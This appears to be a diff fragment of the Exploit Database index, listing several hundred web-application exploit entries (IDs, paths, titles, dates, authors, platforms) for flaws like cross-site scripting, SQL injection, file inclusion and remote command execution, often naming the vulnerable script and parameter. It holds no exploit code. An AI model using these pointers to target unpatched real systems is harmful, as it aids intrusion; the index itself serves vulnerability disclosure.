+32908,exploits/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",webapps,multiple, +32909,exploits/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",webapps,java, +32910,exploits/php/webapps/32910.txt,"Phorum 5.2 - '/admin/badwords.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,webapps,php, +32911,exploits/php/webapps/32911.txt,"Phorum 5.2 - '/admin/banlist.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,webapps,php, +32912,exploits/php/webapps/32912.txt,"Phorum 5.2 - '/admin/users.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,voodoo-labs,webapps,php, +32913,exploits/php/webapps/32913.txt,"Phorum 5.2 - 'versioncheck.php?upgrade_available' Cross-Site Scripting",2009-04-16,voodoo-labs,webapps,php, +32914,exploits/php/webapps/32914.php,"Geeklog 1.5.2 - 'usersettings.php' SQL Injection",2009-04-16,Nine:Situations:Group::bookoo,webapps,php, +32924,exploits/php/webapps/32924.txt,"RazorCMS 0.3RC2 - Multiple Vulnerabilities",2009-04-16,"Jeremi Gosney",webapps,php, +32927,exploits/java/webapps/32927.txt,"BlackBerry Enterprise Server 4.0/4.1 - MDS Connection Service Cross-Site Scripting",2009-04-16,"Ken Millar",webapps,java, +32928,exploits/php/webapps/32928.txt,"Malleo 1.2.3 - 'admin.php' Local File Inclusion",2009-04-17,Drosophila,webapps,php, +32930,exploits/php/webapps/32930.txt,"CMSimple 4.4/4.4.2 - Remote File Inclusion",2014-04-18,NoGe,webapps,php,80 +32932,exploits/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php, +32933,exploits/php/webapps/32933.txt,"Online Contact Manager 3.0 - 'index.php?showGroup' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php, +32934,exploits/php/webapps/32934.txt,"Online Contact Manager 3.0 - 'view.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php, +32935,exploits/php/webapps/32935.txt,"Online Contact Manager 3.0 - 'email.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php, +32936,exploits/php/webapps/32936.txt,"Online Contact Manager 3.0 - 'edit.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php, +32937,exploits/php/webapps/32937.txt,"Online Contact Manager 3.0 - 'delete.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php, +32940,exploits/java/webapps/32940.txt,"Sun Java System Delegated Administrator 6.x - HTTP Response Splitting",2009-04-21,"SCS team",webapps,java, +32941,exploits/php/webapps/32941.txt,"PTCeffect 4.6 - Local File Inclusion / SQL Injection",2014-04-19,"walid naceri",webapps,php, +32943,exploits/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - Cross-Site Request Forgery",2014-04-20,"Rakesh S",webapps,hardware, +32948,exploits/php/webapps/32948.txt,"New5starRating 1.0 - '/admin/control_panel_sample.php' SQL Injection",2009-04-22,zer0day,webapps,php, +32950,exploits/php/webapps/32950.txt,"Flat Calendar 1.1 - 'add.php' HTML Injection",2009-04-22,ZoRLu,webapps,php, +32952,exploits/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Remote Command Execution",2009-04-23,SirGod,webapps,php, +32953,exploits/asp/webapps/32953.vbs,"PuterJam's Blog PJBlog3 3.0.6 - 'action.asp' SQL Injection",2009-04-24,anonymous,webapps,asp, +32958,exploits/php/webapps/32958.txt,"MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-27,Am!r,webapps,php, +32960,exploits/php/webapps/32960.txt,"Invision Power Board 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],webapps,php, +32963,exploits/php/webapps/32963.txt,"Coppermine Photo Gallery 1.4.21 - 'css' Cross-Site Scripting",2009-04-29,"Gerendi Sandor Attila",webapps,php, +32966,exploits/php/webapps/32966.txt,"MyBB 1.4.5 - Multiple Vulnerabilities",2009-05-03,"Jacques Copeau",webapps,php, +32968,exploits/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component - Multiple SQL Injections",2009-05-05,"RedTeam Pentesting",webapps,php, +32969,exploits/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",webapps,php, +32973,exploits/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",webapps,hardware, +32976,exploits/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key",2014-04-22,"Mehmet Ince",webapps,php, +34148,exploits/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass / Persistent",2014-07-23,Vulnerability-Lab,webapps,multiple, +32983,exploits/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph?sorter_value' SQL Injection",2014-04-22,chapp,webapps,php,80 +32985,exploits/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",webapps,php, +32986,exploits/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",webapps,php, +32988,exploits/php/webapps/32988.txt,"VerliAdmin 0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,webapps,php, +32989,exploits/php/webapps/32989.txt,"Verlihub Control Panel 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,webapps,php, +32990,exploits/hardware/webapps/32990.pl,"HP Laser Jet - JavaScript Persistent Cross-Site Scripting via PJL Directory Traversal",2014-04-23,@0x00string,webapps,hardware, +32991,exploits/php/webapps/32991.txt,"Claroline 1.8.11 - '/claroline/linker/notfound.php' Cross-Site Scripting",2009-05-08,"Gerendi Sandor Attila",webapps,php, +32992,exploits/php/webapps/32992.txt,"MagpieRSS 0.72 - Cross-Site Scripting / HTML Injection",2009-05-08,"Justin Klein Keane",webapps,php, +32993,exploits/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 - Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,webapps,php, +32999,exploits/php/webapps/32999.py,"Bonefire 0.7.1 - Reinstall Admin Account",2014-04-24,"Mehmet Ince",webapps,php, +33057,exploits/php/webapps/33057.txt,"Aardvark Topsites PHP 5.2 - 'index.php' Cross-Site Scripting",2009-05-26,anonymous,webapps,php, +33000,exploits/php/webapps/33000.txt,"Cacti 0.8.7 - 'data_input.php' Cross-Site Scripting",2009-05-15,fgeek,webapps,php, +33001,exploits/php/webapps/33001.txt,"Kingsoft Webshield 1.1.0.62 - Cross-Site Scripting / Remote Command Execution",2009-05-20,inking,webapps,php, +33002,exploits/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 - Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,webapps,php, +33003,exploits/php/webapps/33003.txt,"WordPress Plugin Work-The-Flow 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,webapps,php,80 +33004,exploits/php/webapps/33004.txt,"dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read",2014-04-24,Portcullis,webapps,php,80 +33005,exploits/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",webapps,php,80 +33006,exploits/php/webapps/33006.txt,"Alienvault 4.3.1 - Unauthenticated SQL Injection / Cross-Site Scripting",2014-04-24,"Sasha Zivojinovic",webapps,php,443 +33008,exploits/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injections",2009-05-22,Securitylab.ir,webapps,php, +33009,exploits/asp/webapps/33009.txt,"DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting",2009-05-22,"ben hawkes",webapps,asp, +33011,exploits/php/webapps/33011.txt,"PHP-Nuke 8.0 - '/main/tracking/userLog.php' SQL Injection",2009-05-27,"Gerendi Sandor Attila",webapps,php, +33013,exploits/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 - 'updatecheck.php' Cross-Site Scripting",2009-05-15,"Gerendi Sandor Attila",webapps,php, +33014,exploits/php/webapps/33014.txt,"Achievo 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-28,MaXe,webapps,php, +33019,exploits/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management / Authentication Bypass",2014-04-25,"Jared Bird",webapps,multiple, +33021,exploits/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module - 'query' Cross-Site Scripting",2009-06-02,"Schap Security",webapps,php, +33022,exploits/php/webapps/33022.txt,"Joomla! < 1.5.11 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",webapps,php, +33026,exploits/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,webapps,ios, +33030,exploits/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities",2014-04-26,JIKO,webapps,php, +33038,exploits/php/webapps/33038.txt,"Webmedia Explorer 5.0.9/5.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-15,intern0t,webapps,php, +33048,exploits/java/webapps/33048.txt,"DirectAdmin 1.33.6 - 'CMD_REDIRECT' Cross-Site Scripting",2009-05-19,r0t,webapps,java, +33052,exploits/php/webapps/33052.txt,"Basic Analysis and Security Engine (BASE) 1.2.4 - 'readRoleCookie()' Authentication Bypass",2009-05-23,"Tim Medin",webapps,php, +33060,exploits/php/webapps/33060.txt,"phpMyAdmin 3.3.0 - 'db' Cross-Site Scripting",2009-05-30,r0t,webapps,php, +33061,exploits/php/webapps/33061.php,"Joomla! 1.5.x - Cross-Site Scripting / Information Disclosure",2009-06-01,"Juan Galiana Lara",webapps,php, +33065,exploits/php/webapps/33065.txt,"Horde 3.1 - 'Passwd' Module Cross-Site Scripting",2009-06-05,anonymous,webapps,php, +33068,exploits/php/webapps/33068.txt,"ClanSphere 2009 - 'text' Cross-Site Scripting",2009-06-06,"599eme Man",webapps,php, +33070,exploits/php/webapps/33070.py,"ApPHP MicroBlog 1.0.1 - Remote Command Execution",2014-04-28,LOTFREE,webapps,php,80 +33072,exploits/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,webapps,php,80 +33075,exploits/php/webapps/33075.txt,"GeoCore MAX DB Ver. 7.3.3 - Blind SQL Injection",2014-04-28,Esac,webapps,php,80 +33076,exploits/php/webapps/33076.txt,"WordPress Plugin iMember360 3.8.012 < 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",webapps,php,80 +33085,exploits/php/webapps/33085.txt,"Scriptsez Easy Image Downloader - 'id' Cross-Site Scripting",2009-06-14,Moudi,webapps,php, +33087,exploits/php/webapps/33087.txt,"PHPLive! 3.2.2 - 'request.php' SQL Injection",2009-06-16,boom3rang,webapps,php, +33090,exploits/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple Vulnerabilities",2014-04-29,SirGod,webapps,hardware,69 +33091,exploits/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,webapps,php,80 +33347,exploits/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 - Information Disclosure",2009-11-06,"Daniel King",webapps,jsp, +33578,exploits/multiple/webapps/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,webapps,multiple, +33097,exploits/php/webapps/33097.txt,"Programs Rating - 'rate.php?id' Cross-Site Scripting",2009-06-20,Moudi,webapps,php, +33098,exploits/php/webapps/33098.txt,"Programs Rating - 'postcomments.php?id' Cross-Site Scripting",2009-06-20,Moudi,webapps,php, +33102,exploits/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 - Web Mail URI Parsing HTML Injection",2009-06-23,"Andrea Purificato",webapps,php, +33106,exploits/php/webapps/33106.txt,"PG Matchmaking - 'browse_ladies.php?show' Cross-Site Scripting",2009-06-24,Moudi,webapps,php, +33107,exploits/php/webapps/33107.txt,"PG Matchmaking - 'browse_men.php?show' Cross-Site Scripting",2009-06-24,Moudi,webapps,php, +33108,exploits/php/webapps/33108.txt,"PG Matchmaking - 'search.php?show' Cross-Site Scripting",2009-06-24,Moudi,webapps,php, +33109,exploits/php/webapps/33109.txt,"PG Matchmaking - 'services.php?show' Cross-Site Scripting",2009-06-24,Moudi,webapps,php, +33110,exploits/php/webapps/33110.txt,"XZeroScripts XZero Community Classifieds 4.97.8 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-24,Moudi,webapps,php, +33111,exploits/php/webapps/33111.txt,"AIOCP 1.4 - 'cp_html2txt.php' Remote File Inclusion",2009-06-27,"Hadi Kiamarsi",webapps,php, +33112,exploits/php/webapps/33112.txt,"PG Roommate Finder Solution - 'quick_search.php?part' Cross-Site Scripting",2009-06-27,Moudi,webapps,php, +33113,exploits/php/webapps/33113.txt,"PG Roommate Finder Solution - 'viewprofile.php?part' Cross-Site Scripting",2009-06-27,Moudi,webapps,php, +33114,exploits/php/webapps/33114.txt,"Joomla! Component Almond Classifieds 7.5 - Cross-Site Scripting / SQL Injection",2009-06-27,Moudi,webapps,php, +33115,exploits/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - 'index.php?replid' SQL Injection",2009-06-27,Moudi,webapps,php, +33116,exploits/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-06-27,Moudi,webapps,php, +33117,exploits/php/webapps/33117.txt,"AlmondSoft Classifieds Pro - 'gmap.php?addr' Cross-Site Scripting",2009-06-27,Moudi,webapps,php, +33119,exploits/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,webapps,php, +33120,exploits/php/webapps/33120.txt,"Pilot Group eTraining - 'news_read.php' Cross-Site Scripting",2009-06-24,Moudi,webapps,php, +33121,exploits/php/webapps/33121.txt,"Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting",2009-06-24,Moudi,webapps,php, +33122,exploits/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Open Redirection",2009-06-27,"599eme Man",webapps,php, +33125,exploits/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' SQL Injection",2009-06-28,Prince_Pwn3r,webapps,php, +33126,exploits/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,webapps,php, +33127,exploits/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,webapps,php, +40080,exploits/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",webapps,php,80 +40081,exploits/cgi/webapps/40081.py,"Belkin AC1200 Router Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",webapps,cgi,80 +40082,exploits/php/webapps/40082.txt,"WordPress Plugin All in One SEO Pack 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",webapps,php,80 +33197,exploits/php/webapps/33197.txt,"68 Classifieds 4.1 - 'category.php' Cross-Site Scripting",2009-07-27,Moudi,webapps,php, +33130,exploits/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",webapps,php, +33131,exploits/php/webapps/33131.txt,"XOOPS 2.3.3 - 'op' Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",webapps,php, +33132,exploits/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,webapps,php, +33136,exploits/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,webapps,hardware, +33340,exploits/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-10,"Andrew Horton",webapps,php, +33138,exploits/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",webapps,hardware, +33144,exploits/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,webapps,php, +33146,exploits/php/webapps/33146.txt,"CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",webapps,php, +33147,exploits/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Cross-Site Scripting",2009-08-05,"599eme Man",webapps,php, +33149,exploits/php/webapps/33149.txt,"Alkacon OpenCMS 7.x - Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",webapps,php, +33346,exploits/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-06,"Daniel King",webapps,jsp, +33152,exploits/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 - 'cat' Cross-Site Scripting / SQL Injection",2009-08-07,"599eme Man",webapps,php, +33153,exploits/php/webapps/33153.txt,"SupportPRO SupportDesk 3.0 - 'shownews.php' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +33154,exploits/php/webapps/33154.txt,"SQLiteManager 1.2 - 'main.php' Cross-Site Scripting",2009-08-10,"Hadi Kiamarsi",webapps,php, +33155,exploits/php/webapps/33155.txt,"ViArt CMS - 'forums.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +33156,exploits/php/webapps/33156.txt,"Crime24 Stealer Panel 1.0 - Multiple Vulnerabilities",2014-05-03,"Daisuke Dan",webapps,php, +33157,exploits/php/webapps/33157.txt,"ViArt CMS - 'forum.php?forum_id' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +33158,exploits/php/webapps/33158.txt,"ViArt CMS - 'forum_topic_new.php?forum_id' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +33159,exploits/hardware/webapps/33159.txt,"Seagate BlackArmor NAS - Multiple Vulnerabilities",2014-05-03,"Shayan S",webapps,hardware, +33160,exploits/php/webapps/33160.txt,"Papoo 3.x - Upload Images Arbitrary File Upload",2009-08-10,"RedTeam Pentesting GmbH",webapps,php, +33166,exploits/php/webapps/33166.txt,"Discuz! 6.0 - '2fly_gift.php' SQL Injection",2009-08-15,Securitylab.ir,webapps,php, +33167,exploits/cfm/webapps/33167.txt,"Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",webapps,cfm, +33168,exploits/cfm/webapps/33168.txt,"Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting",2009-08-17,"Alexander Polyakov",webapps,cfm, +33169,exploits/cfm/webapps/33169.txt,"Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",webapps,cfm, +33170,exploits/cfm/webapps/33170.txt,"Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",webapps,cfm, +33171,exploits/asp/webapps/33171.txt,"DUWare DUgallery 3.0 - '/admin/edit.asp' Authentication Bypass",2009-08-17,spymeta,webapps,asp, +33178,exploits/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",webapps,php, +33254,exploits/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,webapps,java, +40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple, +33180,exploits/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",webapps,multiple, +33181,exploits/java/webapps/33181.txt,"Computer Associates SiteMinder - Unicode Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",webapps,java, +33186,exploits/php/webapps/33186.txt,"VideoGirls - 'forum.php?t' Cross-Site Scripting",2009-08-26,Moudi,webapps,php, +33187,exploits/php/webapps/33187.txt,"VideoGirls - 'profile.php?profile_name' Cross-Site Scripting",2009-08-26,Moudi,webapps,php, +33188,exploits/php/webapps/33188.txt,"VideoGirls - 'view.php?p' Cross-Site Scripting",2009-08-26,Moudi,webapps,php, +33189,exploits/php/webapps/33189.txt,"PHP-Fusion 6.1.18 - Multiple Information Disclosure Vulnerabilities",2009-08-26,Inj3ct0r,webapps,php, +33190,exploits/php/webapps/33190.txt,"OpenAutoClassifieds 1.5.9 - SQL Injection",2009-08-25,"Andrew Horton",webapps,php, +33191,exploits/php/webapps/33191.txt,"FlexCMS 2.5 - 'CookieUsername' Cookie SQL Injection",2009-08-28,Inj3ct0r,webapps,php, +33195,exploits/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,webapps,php, +33199,exploits/php/webapps/33199.txt,"68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting",2009-07-27,Moudi,webapps,php, +33200,exploits/php/webapps/33200.txt,"68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting",2009-07-27,Moudi,webapps,php, +33201,exploits/php/webapps/33201.txt,"68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting",2009-07-27,Moudi,webapps,php, +33202,exploits/php/webapps/33202.txt,"68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting",2009-07-27,Moudi,webapps,php, +33204,exploits/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Remote File Inclusion",2009-09-09,"Beenu Arora",webapps,php, +33206,exploits/php/webapps/33206.txt,"MKPortal 1.x (Multiple Modules) - Cross-Site Scripting",2009-08-31,Inj3ct0r,webapps,php, +33208,exploits/php/webapps/33208.txt,"MKPortal 1.x - Multiple BBCode HTML Injection Vulnerabilities",2009-08-31,Inj3ct0r,webapps,php, +33209,exploits/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 - Authentication Bypass",2009-09-03,Intevydis,webapps,jsp, +33214,exploits/php/webapps/33214.txt,"DvBBS 2.0 - 'boardrule.php' SQL Injection",2009-09-04,Securitylab.ir,webapps,php, +33217,exploits/php/webapps/33217.txt,"Joomla! Component com_pressrelease - 'id' SQL Injection",2009-09-10,Moudi,webapps,php, +33218,exploits/php/webapps/33218.txt,"Joomla! Component com_mediaalert - 'id' SQL Injection",2009-09-11,Moudi,webapps,php, +33219,exploits/php/webapps/33219.txt,"Planet 2.0 - HTML Injection",2009-09-11,"Steve Kemp",webapps,php, +33226,exploits/php/webapps/33226.txt,"Mega File Hosting Script 1.2 - 'emaillinks.php' Cross-Site Scripting",2009-09-16,Moudi,webapps,php, +33227,exploits/php/webapps/33227.txt,"TuttoPHP Morris Guestbook - 'view.php' Cross-Site Scripting",2009-09-16,Moudi,webapps,php, +33231,exploits/cgi/webapps/33231.txt,"Avaya Intuity Audix LX R1.1 - Multiple Remote Vulnerabilities",2009-09-18,pagvac,webapps,cgi, +33232,exploits/php/webapps/33232.txt,"MyBB 1.4.8 - 'search.php' SQL Injection",2009-09-19,$qL_DoCt0r,webapps,php, +33236,exploits/asp/webapps/33236.txt,"Maxwebportal 1.365 - 'forum.asp' SQL Injection",2009-09-22,OoN_Boy,webapps,asp, +33237,exploits/php/webapps/33237.txt,"Joomla! Component SportFusion 0.2.x - SQL Injection",2009-09-22,kaMtiEz,webapps,php, +33238,exploits/php/webapps/33238.txt,"Joomla! Component JoomlaFacebook - SQL Injection",2009-09-22,kaMtiEz,webapps,php, +33239,exploits/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone - 'view_products.php' SQL Injection",2009-09-22,OoN_Boy,webapps,php, +33240,exploits/php/webapps/33240.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' SQL Injection",2009-09-22,OoN_Boy,webapps,php, +33241,exploits/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' Cross-Site Scripting",2009-09-22,OoN_Boy,webapps,php, +33242,exploits/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - SQL Injection",2009-09-23,OoN_Boy,webapps,php, +33345,exploits/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",webapps,php, +33343,exploits/php/webapps/33343.txt,"CuteNews 1.4.6 - 'result' Cross-Site Scripting",2009-11-10,"Andrew Horton",webapps,php, +33344,exploits/php/webapps/33344.txt,"CuteNews 1.4.6 - 'index.php' Cross-Site Request Forgery (New User Creation)",2009-11-10,"Andrew Horton",webapps,php, +33709,exploits/php/webapps/33709.txt,"Natychmiast CMS - Multiple Cross-Site Scripting / SQL Injections",2010-03-05,"Maciej Gojny",webapps,php, +33247,exploits/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",webapps,hardware, +33248,exploits/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-05-08,"Dolev Farhi",webapps,hardware, +33249,exploits/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",webapps,php, +33250,exploits/php/webapps/33250.txt,"Collabtive 1.2 - Persistent Cross-Site Scripting",2014-05-08,"Deepak Rathore",webapps,php, +33252,exploits/php/webapps/33252.txt,"Cobbler 2.4.x < 2.6.x - Local File Inclusion",2014-05-08,"Dolev Farhi",webapps,php, +33256,exploits/php/webapps/33256.txt,"e107 0.7.x - CAPTCHA Security Bypass / Cross-Site Scripting",2009-09-28,MustLive,webapps,php, +33262,exploits/php/webapps/33262.txt,"Interspire Knowledge Manager 5 - 'p' Directory Traversal",2009-09-29,"Infected Web",webapps,php, +33266,exploits/php/webapps/33266.txt,"Joomla! Component CB Resume Builder - 'group_id' SQL Injection",2009-10-05,kaMtiEz,webapps,php, +33267,exploits/php/webapps/33267.txt,"X-Cart Email Subscription - 'email' Cross-Site Scripting",2009-10-06,"Paulo Santos",webapps,php, +33268,exploits/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",webapps,asp, +33590,exploits/php/webapps/33590.txt,"Joomla! Component AutartiTarot - Directory Traversal",2010-02-01,B-HUNT3|2,webapps,php, +33342,exploits/php/webapps/33342.txt,"CuteNews 1.4.6 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-10,"Andrew Horton",webapps,php, +33281,exploits/php/webapps/33281.txt,"Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",webapps,php, +33282,exploits/php/webapps/33282.txt,"Dream Poll 3.1 - '/index.php' Cross-Site Scripting / SQL Injection",2009-10-13,infosecstuff,webapps,php, +33284,exploits/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,webapps,multiple, +33317,exploits/php/webapps/33317.txt,"Alienvault Open Source SIEM (OSSIM) 4.6.1 - Authenticated SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",webapps,php,443 +33286,exploits/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Cross-Site Scripting",2009-10-14,"Michele Orru",webapps,java, +33287,exploits/php/webapps/33287.txt,"BloofoxCMS 0.3.5 - 'search' Cross-Site Scripting",2009-10-15,"drunken danish rednecks",webapps,php, +33288,exploits/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",webapps,php, +33290,exploits/php/webapps/33290.txt,"Snitz Forums 2000 3.4.7 - 'pop_send_to_friend.asp?url' Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",webapps,php, +33291,exploits/php/webapps/33291.txt,"Snitz Forums 2000 3.4.7 - Sound Tag Onload Attribute Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",webapps,php, +33292,exploits/jsp/webapps/33292.txt,"IBM Rational RequisitePro 7.10 - 'ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp?Operation' Cross-Site Scripting",2009-10-15,IBM,webapps,jsp, +33293,exploits/jsp/webapps/33293.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature 'ReqWebHelp/basic/searchView.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,IBM,webapps,jsp, +33294,exploits/php/webapps/33294.txt,"TBmnetCMS 1.0 - Cross-Site Scripting",2009-10-19,"drunken danish rednecks",webapps,php, +33295,exploits/php/webapps/33295.txt,"OpenDocMan 1.2.5 - 'add.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",webapps,php, +33296,exploits/php/webapps/33296.txt,"OpenDocMan 1.2.5 - 'toBePublished.php' Multiple Cross-Site Scripting 